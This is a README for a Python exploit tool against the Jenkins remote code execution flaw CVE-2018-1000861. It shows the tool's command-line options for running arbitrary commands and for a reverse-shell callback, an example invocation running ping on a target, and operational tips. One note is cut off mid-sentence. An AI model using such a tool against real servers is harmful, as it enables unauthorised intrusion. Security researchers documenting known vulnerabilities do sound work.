# CVE-2018-1000861
Simple script to exploit CVE-2018-1000861, written in Python 3
### Usage:
```
usage: exploit.py [-h] -u URL [-c CMD] [-r] [-i IP] [-p PORT] [-v]

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Target Jenkins server
  -c CMD, --cmd CMD     Command to execute
  -r, --revshell        Execute reverse shell
  -i IP, --ip IP        IP address for reverse shell callback
  -p PORT, --port PORT  Port for reverse shell callback
  -v, --verbose         Verbose output
```
### Ex:
```
python exploit.py -u http://192.168.1.20 -c 'ping 192.168.1.10'
```
### Notes:
- This tool does not attempt to verify the target is vulnerable. All it does is shove a shell command into a Java class.
- Shell commands executed will not return output. You'll need either a method of verifying that the command executed (e.g. ping + tcpdump) or a reverse shell
- This vulnerability affects both Linux and Windows installs of Jenkins where the . You should attempt to verify target OS prior to executing this (such as through ICMP TTL or available services)
- The script *should* work for both Linux and Windows
- The reverse shell module (`-r`, `-i`, `-p` options) isn't implemented
- Use responsibly
### TODO:
- [ ] Platform specific reverse shell modules
- [ ] Vuln identification
- [ ] Verbosity with vuln identification
### Refs:
- Credit to [Orange Tsai](https://twitter.com/orange_8361)
- https://github.com/orangetw/awesome-jenkins-rce-2019
- https://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html
- https://twitter.com/orange_8361/status/1075492505657925632